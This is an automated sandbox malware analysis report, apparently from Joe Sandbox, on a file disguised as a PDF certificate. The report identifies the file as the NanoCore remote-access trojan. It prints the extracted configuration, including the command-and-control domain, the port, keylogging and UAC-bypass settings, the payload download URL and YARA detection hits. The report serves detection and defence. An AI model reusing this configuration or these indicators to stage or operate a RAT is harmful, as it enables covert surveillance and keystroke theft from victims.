Windows Analysis Report
Certificate#U00b7pdf.exe

AV Detection

Source: 7fxcmft-olcmjfjxdk.duckdns.org

Avira URL Cloud: Label: malware

Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "48e0e383-40c8-47b1-a4ea-d717ed94", "Group": "Default", "Domain1": "7fxcmft-olcmjfjxdk.duckdns.org", "Domain2": "", "Port": 3342, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "7fxcmft-olcmjfjxdk.duckdns.org", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Source: 7fxcmft-olcmjfjxdk.duckdns.org	Virustotal: Detection: 11%			Perma Link
Source: http://pesterbdd.com/images/Pester.png4	Virustotal: Detection: 10%			Perma Link
Source: http://pesterbdd.com/images/Pester.png	Virustotal: Detection: 9%			Perma Link
Source: 7fxcmft-olcmjfjxdk.duckdns.org	Virustotal: Detection: 11%			Perma Link

Source: Certificate#U00b7pdf.exe	ReversingLabs: Detection: 31%
Source: Certificate#U00b7pdf.exe	Virustotal: Detection: 53%			Perma Link

Source: Yara match	File source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR

Source: Certificate#U00b7pdf.exe

Joe Sandbox ML: detected

Compliance

Source: Certificate#U00b7pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.20:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.191.129:443 -> 192.168.11.20:49777 version: TLS 1.2

Source: Certificate#U00b7pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: !x""f.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: !indows\System.pdbpdbtem.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: !em.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021890000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdb source: CasPol.exe, 00000005.00000002.28397647622.0000000021895000.00000004.00000020.00020000.00000000.sdmp

Spreading

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,		0_2_004065DA
Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004059A9

Networking

Source: Malware configuration extractor	URLs:
Source: Malware configuration extractor	URLs: 7fxcmft-olcmjfjxdk.duckdns.org

Source: unknown

DNS query: name: 7fxcmft-olcmjfjxdk.duckdns.org

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: 7fxcmft-olcmjfjxdk.duckdns.org

Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000004.00000002.24013324789.000000000309B000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.24023428377.0000000008BA5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mics
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: powershell.exe, 00000004.00000002.24015082052.0000000004C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://subca.ocsp-certum.com01
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://subca.ocsp-certum.com02
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://subca.ocsp-certum.com05
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: Certificate#U00b7pdf.exe	String found in binary or memory: http://www.certum.pl/CPS0
Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000004.00000002.24015082052.0000000004C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB2r
Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/8
Source: CasPol.exe, 00000005.00000002.28382435662.00000000051D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3
Source: CasPol.exe, 00000005.00000002.28382435662.00000000051D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3P
Source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=17YCerFFQP3xEpWryCctLLABeKhxmjpC3&export=download
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443

Source: unknown	HTTPS traffic detected: 142.250.191.110:443 -> 192.168.11.20:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.191.129:443 -> 192.168.11.20:49777 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Code function: 0_2_0040543E GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_0040543E

Source: CasPol.exe, 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: RegisterRawInputDevices

memstr_75d711f8-5

E-Banking Fraud

Source: Yara match	File source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR

System Summary

Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.23fc0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NanoCore Author: ditekSHen
Source: 5.2.CasPol.exe.219b1858.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.28422063726.0000000023FC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NanoCore Author: ditekSHen
Source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000005.00000002.28397844456.00000000219A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 19854
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 19854			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Process Stats: CPU usage > 6%

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

Code function: 0_2_0040336C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040336C

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe

File created: C:\Windows\resources\0409

Jump to behavior

Source: C:\Users\user\Desktop\Certificate#U00b7pdf.exe	Code function: 0_2_00404C7B		0_2_00404C7B
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD2FA8		5_2_23BD2FA8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD23A0		5_2_23BD23A0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD86DD		5_2_23BD86DD
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD931F		5_2_23BD931F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD9258		5_2_23BD9258
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BDAD68		5_2_23BDAD68
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD306F		5_2_23BD306F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 5_2_23BD3850		5_2_23BD3850
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 8_2_011904B0		8_2_011904B0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 8_2_01190938		8_2_01190938

Source: Certificate#U00b7pdf.exe

Static PE information: invalid certificate

Source: Certificate#U00b7pdf.exe, 00000000.00000000.23297968907.00000000007CB000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamePreexchanging Uneradicable.exeDVarFileInfo$ vs Certificate#U00b7pdf.exe
Source: Certificate#U00b7pdf.exe	Binary or memory string: OriginalFilenamePreexchanging Uneradicable.exeDVarFileInfo$ vs Certificate#U00b7pdf.exe

Source: Certificate#U00b7pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
